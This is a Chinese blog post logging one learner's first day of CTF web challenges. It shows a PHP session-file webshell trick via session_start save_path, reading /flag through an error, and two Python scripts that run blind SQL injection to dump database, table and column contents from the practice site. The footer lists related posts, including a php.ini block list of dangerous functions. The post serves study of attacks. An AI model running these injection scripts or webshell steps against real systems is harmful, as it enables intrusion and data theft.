ctf打卡的第一天

最新推荐文章于 2024-10-25 15:08:03 发布
最新推荐文章于 2024-10-25 15:08:03 发布
阅读量656 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jie_a/article/details/117575146
版权

第一题 :

题目为
在这里插入图片描述
我寻思是直接用文件包含读文件呢,整半天整不出来
看了wp后得知是用session写webshell,想起以前好像做过类似的
wp是这么说的:
首先我们要猜测session文件位置
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/var/lib/php5/sess_PHPSESSID
/var/lib/php5/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
/tmp 目录下无法找到 session,因此 session 应该在 /var/lib 目录下。但由于 ini_set(‘open_basedir’, ‘/var/www/html:/tmp’); 的设置,无法包含 /var/lib 下的 session。
session_start 函数存在 options 数组参数,如果提供会覆盖 session 配置项,而其中包含了 save_path,可用来修改 session 保存位置。
因此思路是传入 session_start 函数修改存储位置。
尝试直接写到/tmp目录

http://xuenixiang.cn:32768/?function=session_start&save_path=/tmp

session_start的意思是初始化session
save_path=/tmp的意思是设置session存放路径为/tmp
然后我们测试下
在这里插入图片描述

写入session
包含访问自定义的session文件

 http:// xuenixiang.cn:32768/?function=extract&file=/tmp/sess_text123

显示成功
在这里插入图片描述
然后我们写入webshell
在这里插入图片描述
然后访问文件传参即可
在这里插入图片描述

第二题

上来就是块表
在这里插入图片描述
点一下显示非法字符被过滤
看源代码
在这里插入图片描述
可以get型传参code
提示php黑魔法
上传数组报错试试
在这里插入图片描述
提示flag在/flag里,直接访问
在这里插入图片描述
还有一种方法,
写wp的师傅发现没有过滤字符,用异或构造cat /flag传参

第三题

提示说爬虫会访问什么,爬虫会访问robots
在这里插入图片描述
访问发现出来个目录,访问他
在这里插入图片描述
看起来是个sql注入
发现存在过滤,我们先模糊测试下
在这里插入图片描述
用bp发现过滤了好多,我们挑挑能用的
发现一顿报错,我裂开
发现可以用ascii绕过盲注
今天用脚本盲注

import requests
from string import printable
import time

url = 'http://xuenixiang.cn:25785/sd72CJl5ox6hOL9ZIukc3ADPB1HXKFyY.php'

proxies={'http':'http://127.0.0.1:8080'}
headers={'Content-Type':'application/x-www-form-urlencoded'}

def dump_database():
    j=1
    t=1
    result=''
    while j<=10:
        for i in printable:
                if i!='%':
                    r = requests.post(url,headers={'Content-Type':'application/x-www-form-urlencoded'},data={'id':'1 && ascii(substr(database(),{},10))=ascii("{}")'.format(j,i)})
                    time.sleep(1)
                    if 'guest' in r.text:
                        result=result+i
                        t=0
                        print('Database Name : {}'.format(result))
                        break
        t+=1
        if t ==2 :
            # print('结束了')
            break
        j+=1
dump_database()

以为可能是平台有防护,不能访问过快
我就让他一秒一个请求
所以脚本跑的有点慢,等等就行
还有就是前面试的时候,hackbar不能正常回显
但是在对话框里就行,我郁闷半天我寻思语句错了呢
我也不知道为啥
出来的数据库名字叫easyweb
我受不了了,连接总超时
脚本在这

import requests
from string import printable
import binascii

url = 'http://xuenixiang.cn:20263/sd72CJl5ox6hOL9ZIukc3ADPB1HXKFyY.php'

proxies={'http':'http://127.0.0.1:8080'}
headers={'Content-Type':'application/x-www-form-urlencoded'}

def dump_database():
    j=1
    t=1
    result=''
    while j<=10:
        for i in printable:
                if i!='%':
                    r = requests.post(url,headers={'Content-Type':'application/x-www-form-urlencoded'},data={'id':'1 && ascii(substr(database(),{},10))=ascii("{}")'.format(j,i)})
                    if 'guest' in r.text:
                        result=result+i
                        t=0
                        print('Database Name : {}'.format(result))
                        break
        t+=1
        if t ==2 :
            # print('结束了')
            break
        j+=1

def dump_tablenames():

    for k in range(0,2):
        result=''
        t=1
        for j in range(0,25):
            for i in printable:
                if i!='%':
                    r = requests.post(url,headers={'Content-Type':'application/x-www-form-urlencoded'},data={'id':'1 && ascii(substr((select table_name from sys.schema_table_statistics where table_schema=database() limit {},1),{},1))=ascii("{}")'.format(k,j,i)},timeout=5)
                    if 'guest' in r.text:
                        result=result+i
                        t=0
                        break
            if t ==2 :
                print('Table Name {}: {}'.format(k,result))
                break
            t+=1

def dump_tableslength():
	result=''
	for j in range(0,5):
		for i in range(40):
			data={'id':'1 && length((select table_name from sys.schema_table_statistics where table_schema=database() limit {},1))={}'.format(j,i)}
			r = requests.post(url,headers=headers,data=data)
			if 'guest' in r.text:
				result=i
				print('Table {} Length : {}'.format(j,result))
				break

payload = '''((SELECT 1,CONCAT({flag}, CAST("0" as JSON))) <= (SELECT * FROM `looKkkkk_h3r6` limit 1))'''
# payload = '''((SELECT 1,CONCAT({flag})) <= (SELECT * FROM `looKkkkk_h3r6` limit 1))'''


ASCIIAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz}"

def dump_columns():
	result=''
	last_i = ''
	for j in range(0,44):
		for i in range(32,255):
			t = result+str(chr(i))
			t = '0x'+str(binascii.hexlify(t.encode()))[2:-1]
			# print(t)
			data={'id':'1 && '+payload.format(flag=t)}
			r = requests.post(url,headers=headers,data=data)
			if 'guest' not in r.text:
				result += last_i
				print('columns value : {}'.format(result))
				# print((data['id']))
				break
			last_i=str(chr(i))

dump_database()
dump_tableslength()
dump_tablenames()
dump_columns()

我就懒得调了
还有一个方法是 (select 0,0) <= (select * from looKkkkk_h3r6 limit 1) ,先用0来判断存在多少列,两列的时候有了回显,所以 looKkkkk_h3r6 表中两个字段,先来判断下第一个字段的值,让第二列为’z’,这样 (select 0,‘z’) <= (select * from looKkkkk_h3r6 limit 1) 就可以比较第一列了
第一列为 0时有回显
第一列为 1时没有回显,所以第一列的值是1
第二列也是这样比较,但是MYSQL不区分大小写,一般用binary 转二进制来比较大小写,但这里过滤了in,也就用不了binary了

Mysql中转换类型的函数有cast和convert
翻一下官方文档,看有没有,类型转换除了字符串型,数字型,还有binary 和 json
再看看json,翻到字符串比较,大小写敏感 binary类型

(select 1,concat(0x414141,convert(0,json)) ) < (select * from looKkkkk_h3r6 limit 1)

意思就是盲猜列名和字段,然后看回显是否正常,学到了
但是我觉得我想不出来
总这样,我好烦,我就直接用wp的了
在这里插入图片描述

ubyt0KHOLan9Bh28Rm5e3JlDjwgTCPoI.php
在这里插入图片描述
然后又是个框,显示cmd,可能是命令执行
提示
echo “result:”.shell_exec(“echo “filter($str)” | ctf”);
这玩意不回显光过滤,这啥啊
在这里插入图片描述
wp是这样解的,我复现不出来算了,就这样吧
OK ,找到问题了,我说咋看不懂wp ,没有|这个符号,呢是个光标 …我裂开,我还寻思都过滤了他咋还能用呢…

CTF打卡第一天
weixin_60499871的博客
07-04 626
攻防世界网站:https://adworld.xctf.org.cn/ 新手区第一题:this_is_flag 第二题:pdf下载完文档, 使用PDF转换器为word,打开如下图在图下面有flag 第三题:如来十三掌 打开附件如图 使用佛日解密:得到的:MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9,再使用 rot13解密:用Python脚本 运行得到:ZmxhZ3tiZHNjamhia3ptbmZyZGhidmNraWpuZHNrdmJramRzY
CTF打卡第二天-BUU-Java逆向解密
qq_42602454的博客
09-27 320
解压题目文件发现是一个class文件 使用jad进行反编译,得到Reverse.java文件: 查看Reverse.java文件: // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.kpdus.com/jad.html // Decompiler options: packimports(3) // Source File Name: Reverse.java i.
[NCTF 2018]!晨跑打卡
weixin_62306641的博客
02-01 551
如果不用group_concat的话,他会查询到多行数据,会报错。就需要添加,limit 0,1来获取。刚刚写完,略有所得,与诸位是非师傅分享。2,是过滤了#,--+的情况下如何闭合。但是我们找到,可能要写个脚本一直找。
!晨跑打卡(NCTF)
weixin_45721752的博客
09-13 349
最后得到flag列的内容,flag的内容太长,通过尝试,limit 16,1,跳过前16个找第十七行的数据,猜测,由于有大概三十个l,无法完全显现。看到输入框,首先看是否存在注入点。输入1',发现存在注入点,闭合1''那我们无法通过#或者–+来注释掉最后的单引号而闭合 ,尝试绕过。利用报错注入进行暴库,爆表,字段。
NSS [NCTF 2018]!晨跑打卡
Jay17的博客
10-24 883
NSS [NCTF 2018]!晨跑打卡
记一题CTF safe_include
FROM_my_world的博客
03-11 1840
记一题CTF safe_include
NJUPTCTF-2018出题心得
郁离歌丶的博客
01-21 4944
NJUPTCTF-2018出题心得 NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出题、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群题出了一下,题目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出题心得了吧。虽然我的题全部都有人解出,但是还是有很多人要我写...
CTF第四天和第五天打卡
weixin_60499871的博客
07-08 309
第一题:weak_auth打开网址如图由题目可以知道,考察弱口令知识 。常见的管理员账号:admin,root。 常见的弱密码:123456、12345678、admin、root、toor 等。个个输入一下,admin,密码123456,得到flag如图第二题:simple_php 方向打开网址,进行代码审计,以get方式获取了a,b两个值,地址后面直接加/?a=&b= 赋值传参即可,==为宽松比较(类型不同值一样返回True),=== 为严格比较(类型不同即使值一样也返回False)当字符串和数值比较时
NSSCTF刷题篇web部分
weixin_74427106的博客
10-25 1438
这个源码泄露,可以记录一下,涉及的知识点比较多打开环境查看源码,第一段flag乱码,恢复一下剩下的就只说方法第三段flag就在这里,也是乱码恢复扫出来的目录就是第四段和第六段flag第五段在第四段有提示说和苹果有关系发现第四段flag通过搜索发现苹果和DS_store有关系访问/.DS_store得到第五段flag,和起来就是完全的flag。
WEB漏洞-逻辑越权
weixin_46544151的博客
04-30 1600
目录 33、逻辑越权之水平垂直越权 原理 一、Pikachu-本地水平垂直越权演示(漏洞成因) 1.水平越权 2.垂直越权 3.越权漏洞产生的原理解析: 二、墨者水平-身份认证失效漏洞实战(漏洞成因) 三、越权检测-小米范越权漏洞检测工具(工具使用) 四、越权检测-Burpsuite插件Authz安装测试(插件使用) 1.在burpsuite中插件管理找到Authz安装 2.登录mozhe靶场test用户抓包,抓取card_id 3.pikachu中测试 34、逻辑越权之支付...
php文件包含目录配置open_basedir的使用与性能详解
12-20
1.open_basedir介绍 open_basedir 将php所能打开的文件限制在指定的目录树中,包括文件本身。当程序要使用例如fopen()或file_get_contents()打开一个文件时,这个文件的位置将会被检查。当文件在指定的目录树之外,程序将拒绝打开。 本指令不受安全模式打开或关闭的影响。 2.open_basedir设置方法 1.在php.ini 加入 open_basedir=”指定目录” 2.在程序中使用 ini_set(‘open_basedir’, ‘指定目录’); 但不建议使用这种方法 3.在apache的httpd.conf中的Directory配置 php_
kss admin index.php,XCTF Final 2018 Web Writeup (Bestphp与PUBG详解)
weixin_42303389的博客
03-11 1648
WEB1——Bestphp这道题提供index.php源码index.phphighlight_file(__FILE__);error_reporting(0);ini_set('open_basedir', '/var/www/html:/tmp');$file = 'function.php';$func = isset($_GET['function'])?$_GET['function'...
[SUCTF 2019]EasyWeb
沐目的博客
11-03 5513
https://blog.youkuaiyun.com/qq_42181428/article/details/99741920 https://www.cnblogs.com/cimuhuashuimu/p/11546422.html
open_basedir php.ini,PHP 配置文件中open_basedir选项作用
weixin_34236672的博客
03-10 360
PHP 配置文件中open_basedir选项作用更新时间:2009年07月19日 01:31:15 作者:open_basedir: 将用户可操作的文件限制在某目录下如下是php.ini中的原文说明以及默认配置:; open_basedir, if set, limits all file operations to the defined directory; and below. Thi...
第十天文件包含漏洞 php伪协议
代码审计
03-15 4416
文件包含漏洞PHP中常见包含文件函数常见文件包含漏洞代码文件包含漏洞的危害文件包含的漏洞的分类本地文件包含**1.上传图片马**2.读取网站源码以及配置文件远程文件包含 什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。 例如:include “conn.php” PHP中常见包含文件函数  include() 当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进
php.ini安全配置禁用危险函数open_basedir防止跨目录
赵一舟的博客
01-29 7374
disable_functions = phpinfo,chroot,chown,chmod,system,shell_exec,passthru,exec,assert,pcntl_exec,proc_open,``,phpfunc,proc_get_status,chgrp,popen,get_cfg_var ; ###################### 禁用的危险函数 BEGIN ###...
php open_basedir 安全,php open_basedir安全与使用详解
weixin_29603489的博客
03-18 503
open_basedir的作用就是指定目录位置了,意思是将PHP 所能打开的文件限制在指定的目录树,包括文件本身了,并且不受是不是安全模式的影响.如下是php.ini中的原文说明以及默认配置:; open_basedir, if set, limits all file operations to the defined directory; and below. This directive m...
open_basedir restriction in effect
showso2006的专栏
09-01 7760
<br />open_basedir: 将用户可操作的文件限制在某目录下;<br /> --------------------------------------------------------------------------------<br /> 如下是php.ini中的原文说明以及默认配置:<br /> ; open_basedir, if set, limits all file operations to the defined directory<br /> ; and bel
PHP配置文件中open_basedir选项作用
欢迎来到,Song的小屋
07-18 971
open_basedir: 将用户可操作的文件限制在某目录下;--------------------------------------------------------------------------------如下是php.ini中的原文说明以及默认配置:; open_basedir, if set, limits all file operations to the defined 
hellp ctf的第一关
最新发布
01-31
### 关于CTF比赛第一关的帮助 对于参与CTF(夺旗赛)的新手而言,理解并完成首个挑战至关重要。通常情况下,CTF竞赛中的第一个挑战旨在帮助参赛者熟悉环境以及基本操作流程。 #### 下载与准备 为了获取用于练习的虚拟机镜像文件,可以访问提供的下载链接[^1]。这一步骤确保拥有一个安全隔离的比赛环境,在此环境中进行各种尝试而无需担心影响个人设备的安全性。 #### 容器化设置 考虑到所有挑战都应被容器化处理以便更好地管理和部署,建议参照相关指南来配置Dockerfile以支持CTF题目运行环境[^2]。通过这种方式,不仅能够简化开发过程,还能提高资源利用率和安全性。 针对具体的第一关解法,则取决于该关卡的设计目的和技术要点。如果涉及图像上传功能,并且最终目标是从给定条件求解两个未知数p,q的话,那么可能需要利用线性代数知识解决此类问题[^3]: 假设存在一张尺寸为600x600像素的照片作为输入数据源,通过对图片特征分析提取有效信息建立方程组进而得出答案。实际操作过程中可能会涉及到逆向工程、密码学基础等方面的内容。 ```python from sympy import symbols, Eq, solve # Define the symbols/variables p and q p, q = symbols('p q') # Assuming we got these values from analyzing an uploaded picture or other clues provided within the challenge. equation_1 = Eq(2*p + 3*q, some_value_from_challenge) equation_2 = Eq(p - q, another_value) solution = solve((equation_1,equation_2), (p, q)) print(f"The solutions are {solution}") ``` 上述代码片段展示了如何基于已知条件构建并求解二元一次方程的方法之一;当然实际情况会更加复杂多变,因此鼓励选手们积极思考探索更多可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值